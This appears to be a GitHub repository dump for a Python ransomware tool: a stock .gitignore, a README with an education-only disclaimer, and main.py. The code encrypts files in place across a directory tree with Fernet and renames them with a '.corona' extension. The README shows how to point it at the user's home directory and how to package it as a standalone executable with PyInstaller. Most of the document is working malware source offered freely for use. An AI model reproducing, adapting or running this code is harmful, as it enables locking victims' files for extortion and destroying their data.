├── .gitignore
├── README.md
└── main.py
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.gitignore.io/api/python,visualstudiocode
3 | # Edit at https://www.gitignore.io/?templates=python,visualstudiocode
4 |
5 | ### Python ###
6 | # Byte-compiled / optimized / DLL files
7 | __pycache__/
8 | *.py[cod]
9 | *$py.class
10 |
11 | # C extensions
12 | *.so
13 |
14 | # Distribution / packaging
15 | .Python
16 | build/
17 | develop-eggs/
18 | dist/
19 | downloads/
20 | eggs/
21 | .eggs/
22 | lib/
23 | lib64/
24 | parts/
25 | sdist/
26 | var/
27 | wheels/
28 | pip-wheel-metadata/
29 | share/python-wheels/
30 | *.egg-info/
31 | .installed.cfg
32 | *.egg
33 | MANIFEST
34 |
35 | # PyInstaller
36 | # Usually these files are written by a python script from a template
37 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
38 | *.manifest
39 | *.spec
40 |
41 | # Installer logs
42 | pip-log.txt
43 | pip-delete-this-directory.txt
44 |
45 | # Unit test / coverage reports
46 | htmlcov/
47 | .tox/
48 | .nox/
49 | .coverage
50 | .coverage.*
51 | .cache
52 | nosetests.xml
53 | coverage.xml
54 | *.cover
55 | .hypothesis/
56 | .pytest_cache/
57 |
58 | # Translations
59 | *.mo
60 | *.pot
61 |
62 | # Scrapy stuff:
63 | .scrapy
64 |
65 | # Sphinx documentation
66 | docs/_build/
67 |
68 | # PyBuilder
69 | target/
70 |
71 | # pyenv
72 | .python-version
73 |
74 | # pipenv
75 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
76 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
77 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
78 | # install all needed dependencies.
79 | #Pipfile.lock
80 |
81 | # celery beat schedule file
82 | celerybeat-schedule
83 |
84 | # SageMath parsed files
85 | *.sage.py
86 |
87 | # Spyder project settings
88 | .spyderproject
89 | .spyproject
90 |
91 | # Rope project settings
92 | .ropeproject
93 |
94 | # Mr Developer
95 | .mr.developer.cfg
96 | .project
97 | .pydevproject
98 |
99 | # mkdocs documentation
100 | /site
101 |
102 | # mypy
103 | .mypy_cache/
104 | .dmypy.json
105 | dmypy.json
106 |
107 | # Pyre type checker
108 | .pyre/
109 |
110 | ### VisualStudioCode ###
111 | .vscode/*
112 | !.vscode/settings.json
113 | !.vscode/tasks.json
114 | !.vscode/launch.json
115 | !.vscode/extensions.json
116 |
117 | ### VisualStudioCode Patch ###
118 | # Ignore all local history of files
119 | .history
120 |
121 | # End of https://www.gitignore.io/api/python,visualstudiocode
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Ransomware written in Python
2 |
3 | > Disclaimer: This tool is for education purpose only. I made this just for experimenting and testing and learning purpose. I am not responsible for any misuse of this tool. Be careful what you do.
4 |
5 |
6 |
7 | ### Instructions
8 |
9 | You need [Python3](http://python.org/) (ofcourse!)
10 |
11 | #### Installing
12 |
13 | ```sh
14 | $ pip install cryptography pyinstaller
15 | ```
16 |
17 | once this is done! you can change in `__main__` for `sys_root` or `local_root`
18 |
19 | - sys_root: this config uses `expanduser("~")` means it will get the user's root eg. `/home/username` in Linux or `C:\Users\MyName` in Windows. It will start encrypting given extensions in `file_ext_target` (referenced in Ransomware Class `__init__` method)
20 |
21 | - local_root: this config uses `"."` (Referenced as current directory). This means wherever the file is placed, It will start encrypting from that directory into its sub directories. (eg. if file is executed from `E:\Games` then it will start encrypting files and folders inside `Games` dir)
22 |
23 | - file_ext_target: A list targetting the given extension files will be encrypted. (eg. you can pass as `[ "txt", "pdf", "mp3", ...]`)
24 |
25 | ## Usage
26 |
27 | There are several arguments to be used for execution.
28 |
29 | | Argument | Priority | Description |
30 | |:------------:|:--------:|-----------|
31 | | `--action` | Required | Action takes one parameter either `encrypt` or `decrypt` |
32 | | `--keyfile` | Optional | It is optional with `encrypt` action if you don't have your own key. It will generate by itself and save as `mykey.key` file.
With `decrypt` it is **Required** without key your data won't be decrypted.
33 |
34 | - Here is simple example for `encryption` and `decryption`
35 |
36 | #### Encrypting
37 | ```sh
38 | $ python main.py --action encrypt
39 | ```
40 | OR
41 |
42 | ```sh
43 | $ python main.py --action encrypt --keyfile "./secret.key"
44 | ```
45 |
46 | #### Decrypting
47 |
48 | ```sh
49 | $ python main.py --action decrypt --keyfile "./secret.key"
50 | ```
51 | **NOTE**: Make sure you use correct key file for its belonging encrypted files. Otherwise if they secret key wont match then your data won't be decrypted correctly.
52 |
53 | ## Keyfile
54 |
55 | - **NOTE:** Make sure you save your key file at safe place after you encrypt your data. Take a note that the keyfile will be generated as `mykey.key` where the program is executed.
56 |
57 | ## Compiling
58 |
59 | - You can use `pyinstaller` or any other favourite bundler/compiler to convert it in executable.
60 |
61 | ```sh
62 | $ pyinstaller --onefile main.py -w
63 | ```
64 |
65 | - This will create an executable in dist/ folder from there it will work on any machine without python installed just by running from commandline.
66 | > **NOTE**: all the execution method will remain same just `main.exe` will be replaced instead `python main.py`. Rest of the methods will follow same as above mentioned.
67 |
68 | ### License
69 | - No licnese. Feel free to use by taking care of **Disclaimer**.
70 |
71 | Initiated and made by © Swapnil Soni.
72 |
73 |
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | import os
2 | from cryptography.fernet import Fernet
3 |
4 | class Ransomeware:
5 |
6 | def __init__(self, key=None):
7 | self.key = key
8 | self.crypter = None
9 | self.file_ext_target = [ "txt" ]
10 | self.ransomware_ext = '.corona'
11 |
12 | def generate_key(self):
13 | self.key = Fernet.generate_key()
14 | self.crypter = Fernet(self.key)
15 |
16 | def read_key(self, keyfilename):
17 | with open(keyfilename, 'rb') as f:
18 | self.key = f.read()
19 | self.crypter = Fernet(self.key)
20 |
21 | def write_key(self, keyfilename):
22 | with open(keyfilename, 'wb') as f:
23 | f.write(self.key)
24 |
25 | def rename(self, file_path, encrypted: bool):
26 | # /home/username/path/to/file | file.corona
27 | path_split = list(os.path.split(file_path))
28 | if not encrypted:
29 | # filename => filename.corona
30 | path_split[-1] += self.ransomware_ext
31 | else:
32 | # filename.txt.corona => filename.txt
33 | path_split[-1] = path_split[-1].replace(self.ransomware_ext, '')
34 | encrypted_file_path = os.path.join(*path_split)
35 | os.rename(file_path, encrypted_file_path)
36 |
37 |
38 | def crypt_file(self, file_path, encrypted=False):
39 | with open(file_path, 'rb+') as f:
40 | _data = f.read()
41 | if not encrypted:
42 | print("data before pre encryption:", _data)
43 | data = self.crypter.encrypt(_data)
44 | print("data after post encryption:", data)
45 | else:
46 | print("data before pre decryption:", _data)
47 | data = self.crypter.decrypt(_data)
48 | print("data after post decryption:", data)
49 | f.seek(0)
50 | f.write(data)
51 | f.truncate()
52 | f.close()
53 |
54 | if not encrypted: self.rename(file_path, encrypted=False)
55 | else: self.rename(file_path, encrypted=True)
56 |
57 |
58 |
59 | def crypt_root(self, root_dir, encrypted=False):
60 | for root, _, files in os.walk(root_dir):
61 | for file in files:
62 | abs_path = os.path.join(root, file)
63 |
64 | if not encrypted:
65 | # encrypt the file
66 | if abs_path.split('.')[-1] in self.file_ext_target:
67 | self.crypt_file(abs_path, encrypted=False)
68 | else:
69 | # decrypt the file
70 | if self.ransomware_ext in abs_path:
71 | self.crypt_file(abs_path, encrypted=True)
72 |
73 | if __name__ == "__main__":
74 | # sys_root = os.path.expanduser('~')
75 | local_root = '.'
76 |
77 | # python main.py --action encrypt|decrypt --keyfile "./keyfile"
78 |
79 | import argparse
80 | parser = argparse.ArgumentParser()
81 | parser.add_argument('--action', required=True)
82 | parser.add_argument('--keyfile')
83 |
84 | args = parser.parse_args()
85 | action = args.action.lower()
86 | keyfile = args.keyfile
87 |
88 | rware = Ransomeware()
89 |
90 | if action == 'decrypt':
91 | if keyfile is None:
92 | print("Please provide keyfile with --keyfile \"./keyfile\"")
93 | else:
94 | rware.read_key(keyfile)
95 | rware.crypt_root(local_root, encrypted=True) # use sys_root when building exe
96 |
97 | elif action == 'encrypt':
98 | if keyfile:
99 | rware.read_key(keyfile)
100 | else:
101 | rware.generate_key()
102 | rware.write_key('mykey.key')
103 | rware.crypt_root(local_root, encrypted=False)
104 |
105 |
106 |
--------------------------------------------------------------------------------